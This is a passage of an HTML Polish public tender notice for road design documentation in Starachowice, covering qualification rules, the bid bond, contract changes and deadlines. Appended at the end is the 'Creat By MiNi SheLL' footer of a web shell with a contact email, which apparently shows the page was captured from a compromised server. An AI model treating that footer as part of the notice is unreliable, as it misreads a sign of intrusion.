class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy którzy nie podlegają wykluczeniu (na podstawie art. 108 ust 1 pkt. 1-6 oraz art. 109 ust. 1<br/>pkt. 4 Ustawy oraz art. 7 ust.1 Ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego) oraz spełniają warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej.<br/><br/>	Warunek zostanie spełniony:<br/><br/>a) jeżeli wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem<br/> terminu składania ofert, a jeżeli okres prowadzenia działalności jest <br/> krótszy – w tym okresie, wykonał:<br/> <br/>	- co najmniej jedną dokumentację projektową na remont, budowę,<br/> rozbudowę lub przebudowę itp. drogi (minimum klasy Z),<br/><br/> b)	wykonawca wykaże, że dysponuje lub będzie dysponował osobami które będą uczestniczyć w wykonaniu zamówienia (osoby skierowane przez wykonawcę do realizacji zamówienia) legitymujące się kwalifikacjami zawodowymi, doświadczeniem i wykształceniem odpowiednimi do funkcji jakie zostaną im powierzone:<br/><br/> -	Projektant w specjalności drogowej – 1 osoba <br/>Wskazana osoba musi posiadać uprawnienia budowlane do projektowania bez ograniczeń w specjalności drogowej (podstawa prawna Ustawa <br/>Prawo budowlane). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpis albo informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust.1 pkt.4 Ustawy.<br/><br/> Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania w kraju, w którym nie wydaje się dokumentów o których mowa w pkt.10.1a to zamiast dokumentów o których mowa w pkt. 10.1a składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia procedury. <br/> Dokumenty te powinny być wystawione nie wcześniej niż 3 miesięcy przed złożeniem.<br/> Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, <br/>o których mowa powyżej, zastępuje się je dokumentem zawierającym odpowiednio <br/>oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego <br/>reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą złożone przed <br/>organem sadowym lub administracyjnym, notariuszem, organem samorządu <br/>zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania tej wykonawcy. Przepis dotyczący terminu wystawienia dokumentu stosuje się odpowiednio. (Dokumenty te powinny być wystawione nie wcześniej niż 3 miesiące przed złożeniem).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest <br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca <br/>wykonania i podmiotów, na rzecz których usługi te zostały wykonane z załączeniem<br/>dowodów określających czy te usługi zostały wykonane należycie, w szczególności informacji o tym czy usługi zostały wykonane zgodnie z obowiązującymi przepisami i prawidłowo ukończone, przy czym dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi były wykonywane a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne dokumenty – załącznik nr 6.<br/><br/>Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia<br/>publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami – załącznik nr 7.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają zgodnie z art.117 ust. 4 Ustawy, oświadczenie (załącznik nr 5 SWZ), z którego wynika które usługi wykonają poszczególni Wykonawcy.<br/><br/>Wykonawca, który w celu potwierdzenia spełniania warunków udziału w postępowaniu polega na zdolnościach innych podmiotów, musi udowodnić zamawiającemu, że realizując zamówienie będzie dysponował niezbędnymi zasobami tych podmiotów, przedstawiając w szczególności zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów – propozycja zobowiązania - załącznik nr 4 do SWZ.<br/><br/>Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach w oświadczeniach wymienionych w pkt. 9.1a i 9.1b. oraz przekazuje oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia (9.1b) tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu (9.1a), w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/><br/>Potwierdzenie wniesienia wadium na zasadach opisanych w ust. 12 SWZ (jeżeli wadium jest wymagane przez Zamawiającego).<br/><br/>Pełnomocnictwo do reprezentowania wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia (w tym spółki cywilne). <br/><br/>Pełnomocnictwo do występowania w imieniu wykonawcy w przypadku, gdy ofertę i inne dokumenty nie podpisuje osoba uprawniona do reprezentowania wykonawcy (lub<br/> wykonawca w przypadku osób fizycznych).<br/><br/>W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania, wykonawca składa Zamawiającemu odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru. Wykonawca nie jest zobowiązany do złożenia wskazanych dokumentów jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/><br/>W przypadku gdy wykonawca wskaże, że opisane w ust. 9.8 SWZ dokumenty lub podmiotowe środki dowodowe są dostępne pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający może żądać od wykonawcy przedstawienia tłumaczenia na język polski pobranych samodzielnie przez Zamawiającego dokumentów lub podmiotowych środków dowodowych.<br/><br/> Dokumenty (oświadczenia, pełnomocnictwa, odpisy, informacje) wskazane w niniejszym ustępie składa się w formie opisanej w pkt. 10.7 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Przed upływem terminu składania ofert należy wnieść wadium w wysokości 3500,00 zł słownie złotych: trzy tysiące pięćset 00/100.<br/><br/>Wadium może być wnoszone w jednej lub kilku następujących formach:<br/> a. pieniądzu<br/> b. gwarancjach bankowych<br/> c. gwarancjach ubezpieczeniowych<br/> d. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt.2<br/> ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju<br/> Przedsiębiorczości (Dz.U. z 2023 r. poz. 462).<br/><br/> Gwarancja bankowa, ubezpieczeniowa lub poręczenie wniesionego wadium musi:<br/> - zawierać w swej treści klauzulę o nieodwołalności gwarancji, jej bezwarunkowości oraz <br/> dokonaniu zapłaty na każde pisemne żądanie zgłoszone przez Zamawiającego;<br/> - obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez<br/> wykonawcę (art.98 ust. 6 Ustawy).<br/><br/>Beneficjentem jest Zarząd Dróg Powiatowych ul. Ostrowiecka 15 27-200 Starachowice.<br/><br/>Wadium w pieniądzu należy wnieść na rachunek bankowy:<br/> <br/> 11 1090 2590 0000 0001 4730 9043 <br/><br/> a. przy czym za termin wniesienia wadium w formie pieniężnej przyjmuje się termin <br/> uznania na rachunku bankowym Zamawiającego. <br/><br/> b. w przypadku wpłaty wadium w pieniądzu przez Wykonawcę z siedzibą poza terytorium<br/> Rzeczypospolitej Polskiej w walucie innej niż PLN, należy upewnić się, czy na konto<br/> Zamawiającego wpłynęła cała kwota wadium, nie pomniejszona o koszty prowizji <br/> bankowych związanych z przeliczeniem walut obcych na PLN. <br/><br/> W przypadku gdy wadium wnoszone jest w formie gwarancji lub poręczenia wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w formie elektronicznej (dokument opatrzony kwalifikowanym podpisem elektronicznym) lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/><br/>12.5. Brak wniesienia wadium spowoduje odrzucenie oferty.<br/> <br/>Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia wystąpienia jednej z okoliczności:<br/>1) upływu terminu związania ofertą;<br/>2) zawarcia umowy w sprawie zamówienia publicznego;<br/>3) unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/><br/>Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku zwraca wadium wykonawcy:<br/>1) który wycofał ofertę przed upływem terminu składania ofert;<br/>2) którego oferta została odrzucona;<br/>3) po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza;<br/>4) po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte<br/> odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/><br/>Złożenie wniosku o zwrot wadium, o którym mowa w pkt. 12.7 SWZ, powoduje rozwiązanie stosunku prawnego z wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W przypadku wspólnego ubiegania się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (do oferty należy załączyć odpowiednie pełnomocnictwo). Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako pełnomocnik pozostałych.<br/><br/> W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (w tym <br/> konsorcja, spółki cywilne) żaden z Wykonawców nie może podlegać wykluczeniu <br/> (podstawy wykluczenia - pkt. 8.1 SWZ.).<br/> Natomiast spełnianie warunków opisanych w pkt. 8.2 SWZ Wykonawcy wykazują wspólnie, <br/> łącznie. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają oświadczenie z którego wynika które roboty wykonają poszczególni wykonawcy (9.2 SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Niedopuszczalne są zmiany istotnych postanowień Umowy w stosunku do treści oferty, <br/> na podstawie której dokonano wyboru Wykonawcy, za wyjątkiem zmian przewidzianych<br/> w Umowie na podstawie art. 455 oraz jeżeli zajdzie co najmniej jedna <br/> z okoliczności przewidzianych w art. 455 Ustawy.<br/><br/>Na podstawie art.455 Ustawy Zamawiający przewiduje następujące <br/> możliwości zmiany Umowy:<br/> <br/>Zamawiający dopuszcza możliwość przedłużenia terminu realizacji wykonania <br/>zamówienia w przypadku wystąpienia niezależnych od Wykonawcy okoliczności:<br/><br/>zaistnienie okoliczności będących następstwem działania organów administracji lub osób indywidualnych, w szczególności:<br/><br/>a)	w przypadku przedłużania się procedur administracyjnych na etapie wydawania opinii, uzgodnień, zgód, postanowień i decyzji administracyjnych, jeżeli przedłużenie to nie wynikało z winy Wykonawcy;<br/><br/>b)	w przypadku przedłużających się konsultacji społecznych, protestów mieszkańców, właścicieli terenu bądź innych podmiotów, których dotyczy realizacja zamówienia;<br/><br/>c)	w przypadku wystąpienia nieprzewidzianych prac nie objętych przedmiotem zamówienia, mających wpływ na prawidłowe wykonanie przedmiotu Umowy, których realizacja powoduje konieczność przedłużenia terminu umowy podstawowej;<br/><br/>d)	przedłużenia przez władze państwowe stanu epidemii lub dokonania zmiany tego stanu na inny stan wyjątkowy, ograniczający normalny sposób funkcjonowania. <br/><br/><br/>W przypadku zaistnienia w/w okoliczności Zamawiający może przedłużyć termin zakończenia wykonania przedmiotu umowy na pisemny, szczegółowo uzasadniony wniosek Wykonawcy. Okres przedłużenia terminu nie może być dłuższy niż czas trwania tych okoliczności.<br/> <br/>Zmiana osoby na stanowisku projektanta pod warunkiem, że wskazana osoba będzie spełniać warunki udziału w postępowaniu określone w Specyfikacji Warunków Zamówienia.<br/><br/>Zamawiający dopuszcza rezygnację z Podwykonawcy lub zmianę Podwykonawcy. <br/>W przypadku zmiany lub rezygnacji z Podwykonawcy, na którego zasoby Wykonawca powoływał się w celu wykazania spełniania warunków udziału w postępowaniu, Wykonawca jest zobowiązany do wykazania Zamawiającemu, że proponowany inny Podwykonawca lub Wykonawca samodzielnie spełnia warunki udziału w postępowaniu <br/>w stopniu nie mniejszym niż Podwykonawca, na którego zasoby Wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia. <br/><br/>W przypadku, gdy oferta Wykonawcy realizującego usługi nie zawierała wskazania części, którą na etapie realizacji zamówienia zamierza on powierzyć Podwykonawcy, Zamawiający dopuszcza zmianę postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, tj. powierzenia części zamówienia do realizacji przez Podwykonawców.<br/><br/>Zmiany o charakterze podmiotowym w zakresie Wykonawcy zamówienia, jeżeli po stronie Wykonawcy występują podmioty działające wspólnie (np. konsorcja, spółka cywilna) <br/>i w trakcie realizacji umowy wystąpią okoliczności uniemożliwiające dalsze działania wszystkim podmiotom tworzącym stronę wykonawczą, w szczególności gdy została ogłoszona upadłość lub została otwarta likwidacja jednego lub kilku z tych podmiotów – w takim przypadku dopuszcza się za uprzednią zgodą Zamawiającego przejęcie obowiązków Wykonawcy przez pozostałe podmioty tworzące stronę Wykonawcy celem dokończenia realizacji umowy na niezmienionych warunkach.<br/><br/>Zamawiający wskazuje pozostałe przypadki przewidzianych w umowie zmian w informacjach dodatkowych (SEKCJA IX – POZOSTAŁE INFORMACJE). Pełny opis zmian zawarty jest także w ust. 21 SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-21 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy złożyć za pośrednictwem platformy e-Zamówienia.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-21 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-11-19</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Pozostałe przypadki przewidzianych zmian w umowie:<br/><br/>Zmiany niezbędne do prawidłowej realizacji Umowy spowodowane:<br/>– zmianą obowiązujących przepisów prawa powodującą, że realizacja przedmiotu Umowy<br/> w niezmienionej postaci stanie się niecelowa,<br/>– okolicznościami powodującymi, że przedmiot Umowy nie może zostać zrealizowany <br/> zgodnie z zasadami sztuki inżynierskiej,<br/>– gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy <br/> okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze Stron nie ponosi <br/> odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy.<br/><br/>Oznaczenia danych dotyczących Zamawiającego i/lub Wykonawcy.<br/><br/>Zmiany osoby odpowiedzialnej za realizację zamówienia ze strony Zamawiającego/Wykonawcy.<br/> <br/>Wniosek o zmianę Umowy powinien zawierać zakres proponowanej zmiany, opis okoliczności faktycznych uprawniających do dokonania zmiany, informacje i dowody potwierdzające, że zostały spełnione okoliczności uzasadniające dokonanie zmiany Umowy. <br/><br/> Strona wnioskująca o zmianę terminu wykonania Umowy zobowiązana jest do wykazania, że ze względu na zaistniałe okoliczności – uprawniające do dokonania zmiany – dochowanie pierwotnego terminu jest niemożliwe.<br/><br/>Całość zmian przewidzianych w treści umowy zawierają projektowane postanowienia umowy - Rozdział IV Specyfikacji Warunków Zamówienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com